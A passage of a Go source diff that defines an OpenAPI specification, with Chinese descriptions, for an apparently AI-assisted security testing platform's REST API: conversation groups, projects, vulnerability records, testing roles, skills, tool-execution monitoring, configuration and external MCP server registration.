map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "添加对话到分组", + "description": "将对话添加到指定分组", + "operationId": "addConversationToGroup", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/AddConversationToGroupRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "添加成功", + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "404": map[string]interface{}{ + "description": "对话或分组不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/groups/{id}/conversations/{conversationId}": map[string]interface{}{ + "delete": map[string]interface{}{ + "tags": []string{"对话分组"}, + "summary": "从分组移除对话", + "description": "从指定分组中移除对话", + "operationId": "removeConversationFromGroup", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "分组ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + { + "name": "conversationId", + "in": "path", + "required": true, + "description": "对话ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "移除成功", + }, + "404": map[string]interface{}{ + "description": "对话或分组不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/projects": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"项目管理"}, + "summary": "列出项目", + "operationId": "listProjects", + "parameters": []map[string]interface{}{ + {"name": "status", "in": "query", "schema": map[string]interface{}{"type": "string", "enum": []string{"active", "archived"}}}, + {"name": "limit", "in": "query", "schema": map[string]interface{}{"type": "integer", "default": 200}}, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "项目列表"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + "post": map[string]interface{}{ + "tags": []string{"项目管理"}, + "summary": "创建项目", + "operationId": "createProject", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "name": map[string]interface{}{"type": "string"}, + "description": map[string]interface{}{"type": "string"}, + "scope_json": map[string]interface{}{"type": "string"}, + }, + "required": []string{"name"}, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{"description": "创建成功"}, + "401": map[string]interface{}{"description": "未授权"}, + }, + }, + }, + "/api/projects/{id}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"项目管理"}, "summary": "获取项目", "operationId": "getProject", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{"200": map[string]interface{}{"description": "项目详情"}}, + }, + "put": map[string]interface{}{ + "tags": []string{"项目管理"}, "summary": "更新项目", "operationId": "updateProject", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{"200": map[string]interface{}{"description": "更新成功"}}, + }, + "delete": map[string]interface{}{ + "tags": []string{"项目管理"}, "summary": "删除项目", "operationId": "deleteProject", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{"200": map[string]interface{}{"description": "删除成功"}}, + }, + }, + "/api/projects/{id}/facts": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"项目管理"}, "summary": "列出或按 key 获取事实", "operationId": "listProjectFacts", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}}, + {"name": "fact_key", "in": "query", "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{"200": map[string]interface{}{"description": "事实列表或单条"}}, + }, + "post": map[string]interface{}{ + "tags": []string{"项目管理"}, "summary": "创建/更新事实", "operationId": "upsertProjectFactREST", + "parameters": []map[string]interface{}{ + {"name": "id", "in": "path", "required": true, "schema": map[string]interface{}{"type": "string"}}, + }, + "responses": map[string]interface{}{"200": map[string]interface{}{"description": "成功"}}, + }, + }, + "/api/vulnerabilities": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"漏洞管理"}, + "summary": "列出漏洞", + "description": "获取漏洞列表,支持分页和筛选", + "operationId": "listVulnerabilities", + "parameters": []map[string]interface{}{ + { + "name": "limit", + "in": "query", + "required": false, + "description": "每页数量", + "schema": map[string]interface{}{ + "type": "integer", + "default": 20, + "minimum": 1, + "maximum": 100, + }, + }, + { + "name": "offset", + "in": "query", + "required": false, + "description": "偏移量", + "schema": map[string]interface{}{ + "type": "integer", + "default": 0, + "minimum": 0, + }, + }, + { + "name": "page", + "in": "query", + "required": false, + "description": "页码(与offset二选一)", + "schema": map[string]interface{}{ + "type": "integer", + "minimum": 1, + }, + }, + { + "name": "id", + "in": "query", + "required": false, + "description": "漏洞ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + { + "name": "conversation_id", + "in": "query", + "required": false, + "description": "对话ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + { + "name": "project_id", + "in": "query", + "required": false, + "description": "项目ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + { + "name": "severity", + "in": "query", + "required": false, + "description": "严重程度", + "schema": map[string]interface{}{ + "type": "string", + "enum": []string{"critical", "high", "medium", "low", "info"}, + }, + }, + { + "name": "status", + "in": "query", + "required": false, + "description": "状态", + "schema": map[string]interface{}{ + "type": "string", + "enum": []string{"open", "closed", "fixed"}, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/ListVulnerabilitiesResponse", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "post": map[string]interface{}{ + "tags": []string{"漏洞管理"}, + "summary": "创建漏洞", + "description": "创建一个新的漏洞记录", + "operationId": "createVulnerability", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/CreateVulnerabilityRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "创建成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Vulnerability", + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/vulnerabilities/stats": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"漏洞管理"}, + "summary": "获取漏洞统计", + "description": "获取漏洞统计信息", + "operationId": "getVulnerabilityStats", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/VulnerabilityStats", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/vulnerabilities/{id}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"漏洞管理"}, + "summary": "获取漏洞", + "description": "获取指定漏洞的详细信息", + "operationId": "getVulnerability", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "漏洞ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Vulnerability", + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "漏洞不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"漏洞管理"}, + "summary": "更新漏洞", + "description": "更新漏洞信息", + "operationId": "updateVulnerability", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "漏洞ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/UpdateVulnerabilityRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Vulnerability", + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "404": map[string]interface{}{ + "description": "漏洞不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"漏洞管理"}, + "summary": "删除漏洞", + "description": "删除指定漏洞", + "operationId": "deleteVulnerability", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "漏洞ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "404": map[string]interface{}{ + "description": "漏洞不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/roles": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"角色管理"}, + "summary": "列出角色", + "description": "获取所有安全测试角色", + "operationId": "getRoles", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "roles": map[string]interface{}{ + "type": "array", + "description": "角色列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/RoleConfig", + }, + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "post": map[string]interface{}{ + "tags": []string{"角色管理"}, + "summary": "创建角色", + "description": "创建一个新的安全测试角色", + "operationId": "createRole", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/RoleConfig", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "创建成功", + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/roles/{name}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"角色管理"}, + "summary": "获取角色", + "description": "获取指定角色的详细信息", + "operationId": "getRole", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "角色名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "role": map[string]interface{}{ + "$ref": "#/components/schemas/RoleConfig", + }, + }, + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "角色不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"角色管理"}, + "summary": "更新角色", + "description": "更新指定角色的配置", + "operationId": "updateRole", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "角色名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/RoleConfig", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "404": map[string]interface{}{ + "description": "角色不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"角色管理"}, + "summary": "删除角色", + "description": "删除指定角色", + "operationId": "deleteRole", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "角色名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "404": map[string]interface{}{ + "description": "角色不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/skills": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "列出Skills", + "description": "获取所有Skills列表,支持分页和搜索", + "operationId": "getSkills", + "parameters": []map[string]interface{}{ + { + "name": "limit", + "in": "query", + "required": false, + "description": "每页数量", + "schema": map[string]interface{}{ + "type": "integer", + "default": 20, + }, + }, + { + "name": "offset", + "in": "query", + "required": false, + "description": "偏移量", + "schema": map[string]interface{}{ + "type": "integer", + "default": 0, + }, + }, + { + "name": "search", + "in": "query", + "required": false, + "description": "搜索关键词", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "skills": map[string]interface{}{ + "type": "array", + "description": "Skills列表", + "items": map[string]interface{}{ + "$ref": "#/components/schemas/Skill", + }, + }, + "total": map[string]interface{}{ + "type": "integer", + "description": "总数", + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "post": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "创建Skill", + "description": "创建一个新的Skill", + "operationId": "createSkill", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/CreateSkillRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "创建成功", + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/skills/stats": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "获取Skill统计", + "description": "获取Skill调用统计信息", + "operationId": "getSkillStats", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "description": "统计信息", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "清空Skill统计", + "description": "清空所有Skill的调用统计", + "operationId": "clearSkillStats", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "清空成功", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/skills/{name}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "获取Skill", + "description": "获取指定Skill的详细信息", + "operationId": "getSkill", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "Skill名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Skill", + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "Skill不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "更新Skill", + "description": "更新指定Skill的信息", + "operationId": "updateSkill", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "Skill名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/UpdateSkillRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "404": map[string]interface{}{ + "description": "Skill不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "删除Skill", + "description": "删除指定Skill", + "operationId": "deleteSkill", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "Skill名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "404": map[string]interface{}{ + "description": "Skill不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/skills/{name}/bound-roles": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "获取绑定角色", + "description": "获取使用指定Skill的所有角色", + "operationId": "getSkillBoundRoles", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "Skill名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "roles": map[string]interface{}{ + "type": "array", + "description": "角色列表", + "items": map[string]interface{}{ + "type": "string", + }, + }, + }, + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "Skill不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/skills/{name}/stats": map[string]interface{}{ + "delete": map[string]interface{}{ + "tags": []string{"Skills管理"}, + "summary": "清空Skill统计", + "description": "清空指定Skill的调用统计", + "operationId": "clearSkillStatsByName", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "Skill名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "清空成功", + }, + "404": map[string]interface{}{ + "description": "Skill不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/monitor": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"监控"}, + "summary": "获取监控信息", + "description": "获取工具执行监控信息,支持分页和筛选", + "operationId": "monitor", + "parameters": []map[string]interface{}{ + { + "name": "page", + "in": "query", + "required": false, + "description": "页码", + "schema": map[string]interface{}{ + "type": "integer", + "default": 1, + "minimum": 1, + }, + }, + { + "name": "page_size", + "in": "query", + "required": false, + "description": "每页数量", + "schema": map[string]interface{}{ + "type": "integer", + "default": 20, + "minimum": 1, + "maximum": 100, + }, + }, + { + "name": "status", + "in": "query", + "required": false, + "description": "状态筛选", + "schema": map[string]interface{}{ + "type": "string", + "enum": []string{"success", "failed", "running"}, + }, + }, + { + "name": "tool", + "in": "query", + "required": false, + "description": "工具名称筛选(支持部分匹配)", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/MonitorResponse", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/monitor/execution/{id}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"监控"}, + "summary": "获取执行记录", + "description": "获取指定执行记录的详细信息", + "operationId": "getExecution", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "执行ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/ToolExecution", + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "执行记录不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"监控"}, + "summary": "删除执行记录", + "description": "删除指定的执行记录", + "operationId": "deleteExecution", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "执行ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "404": map[string]interface{}{ + "description": "执行记录不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/monitor/execution/{id}/cancel": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"监控"}, + "summary": "取消进行中的工具执行", + "description": "对当前进程内正在执行的 MCP 工具调用发送 context 取消信号;上层对话/多步任务可继续。若执行已结束或未在本进程内运行则返回 404。", + "operationId": "cancelExecution", + "parameters": []map[string]interface{}{ + { + "name": "id", + "in": "path", + "required": true, + "description": "执行ID", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": false, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "note": map[string]interface{}{ + "type": "string", + "description": "可选。非空时与工具已返回输出合并交给大模型,并带有「用户终止说明」标题块以便与命令行原文区分", + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "已发送终止信号", + }, + "400": map[string]interface{}{ + "description": "请求体不是合法 JSON", + }, + "404": map[string]interface{}{ + "description": "未找到进行中的工具执行", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/monitor/executions": map[string]interface{}{ + "delete": map[string]interface{}{ + "tags": []string{"监控"}, + "summary": "批量删除执行记录", + "description": "批量删除执行记录", + "operationId": "deleteExecutions", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "删除成功", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/monitor/stats": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"监控"}, + "summary": "获取统计信息", + "description": "获取工具执行统计信息", + "operationId": "getStats", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "description": "统计信息", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/config": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"配置管理"}, + "summary": "获取配置", + "description": "获取系统配置信息", + "operationId": "getConfig", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/ConfigResponse", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"配置管理"}, + "summary": "更新配置", + "description": "更新系统配置", + "operationId": "updateConfig", + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/UpdateConfigRequest", + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "更新成功", + }, + "400": map[string]interface{}{ + "description": "请求参数错误", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/config/tools": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"配置管理"}, + "summary": "获取工具配置", + "description": "获取所有工具的配置信息", + "operationId": "getTools", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "array", + "description": "工具配置列表", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/config/apply": map[string]interface{}{ + "post": map[string]interface{}{ + "tags": []string{"配置管理"}, + "summary": "应用配置", + "description": "应用配置更改", + "operationId": "applyConfig", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "应用成功", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/external-mcp": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"外部MCP管理"}, + "summary": "列出外部MCP", + "description": "获取所有外部MCP配置和状态", + "operationId": "getExternalMCPs", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "servers": map[string]interface{}{ + "type": "object", + "description": "MCP服务器配置", + "additionalProperties": map[string]interface{}{ + "$ref": "#/components/schemas/ExternalMCPResponse", + }, + }, + "stats": map[string]interface{}{ + "type": "object", + "description": "统计信息", + }, + }, + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/external-mcp/stats": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"外部MCP管理"}, + "summary": "获取外部MCP统计", + "description": "获取外部MCP统计信息", + "operationId": "getExternalMCPStats", + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "description": "统计信息", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + }, + "/api/external-mcp/{name}": map[string]interface{}{ + "get": map[string]interface{}{ + "tags": []string{"外部MCP管理"}, + "summary": "获取外部MCP", + "description": "获取指定外部MCP的配置和状态", + "operationId": "getExternalMCP", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "MCP名称", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "获取成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/ExternalMCPResponse", + }, + }, + }, + }, + "404": map[string]interface{}{ + "description": "MCP不存在", + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "put": map[string]interface{}{ + "tags": []string{"外部MCP管理"}, + "summary": "添加或更新外部MCP", + "description": "添加新的外部MCP配置或更新现有配置。\n**传输方式**:\n支持两种传输方式:\n**1. stdio(标准输入输出)**:\n```json\n{\n \"config\": {\n \"enabled\": true,\n \"command\": \"node\",\n \"args\": [\"/path/to/mcp-server.js\"],\n \"env\": {}\n }\n}\n```\n**2. sse(Server-Sent Events)**:\n```json\n{\n \"config\": {\n \"enabled\": true,\n \"transport\": \"sse\",\n \"url\": \"http://127.0.0.1:8082/sse\",\n \"timeout\": 30\n }\n}\n```\n**配置参数说明**:\n- `enabled`: 是否启用(boolean,必需)\n- `command`: 命令(stdio模式必需,如:\"node\", \"python\")\n- `args`: 命令参数数组(stdio模式必需)\n- `env`: 环境变量(object,可选)\n- `transport`: 传输方式(\"stdio\" 或 \"sse\",sse模式必需)\n- `url`: SSE端点URL(sse模式必需)\n- `timeout`: 超时时间(秒,可选,默认30)\n- `description`: 描述(可选)", + "operationId": "addOrUpdateExternalMCP", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "MCP名称(唯一标识符)", + "schema": map[string]interface{}{ + "type": "string", + }, + }, + }, + "requestBody": map[string]interface{}{ + "required": true, + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/AddOrUpdateExternalMCPRequest", + }, + "examples": map[string]interface{}{ + "stdio": map[string]interface{}{ + "summary": "stdio模式配置", + "description": "使用标准输入输出方式连接外部MCP服务器", + "value": map[string]interface{}{ + "config": map[string]interface{}{ + "enabled": true, + "command": "node", + "args": []string{"/path/to/mcp-server.js"}, + "env": map[string]interface{}{}, + "timeout": 30, + "description": "Node.js MCP服务器", + }, + }, + }, + "sse": map[string]interface{}{ + "summary": "SSE模式配置", + "description": "使用Server-Sent Events方式连接外部MCP服务器", + "value": map[string]interface{}{ + "config": map[string]interface{}{ + "enabled": true, + "transport": "sse", + "url": "http://127.0.0.1:8082/sse", + "timeout": 30, + "description": "SSE MCP服务器", + }, + }, + }, + }, + }, + }, + }, + "responses": map[string]interface{}{ + "200": map[string]interface{}{ + "description": "操作成功", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "type": "object", + "properties": map[string]interface{}{ + "message": map[string]interface{}{ + "type": "string", + "example": "外部MCP配置已保存", + }, + }, + }, + }, + }, + }, + "400": map[string]interface{}{ + "description": "请求参数错误(如配置格式不正确、缺少必需字段等)", + "content": map[string]interface{}{ + "application/json": map[string]interface{}{ + "schema": map[string]interface{}{ + "$ref": "#/components/schemas/Error", + }, + "example": map[string]interface{}{ + "error": "stdio模式需要提供command和args参数", + }, + }, + }, + }, + "401": map[string]interface{}{ + "description": "未授权", + }, + }, + }, + "delete": map[string]interface{}{ + "tags": []string{"外部MCP管理"}, + "summary": "删除外部MCP", + "description": "删除指定的外部MCP配置", + "operationId": "deleteExternalMCP", + "parameters": []map[string]interface{}{ + { + "name": "name", + "in": "path", + "required": true, + "description": "MCP名称", + 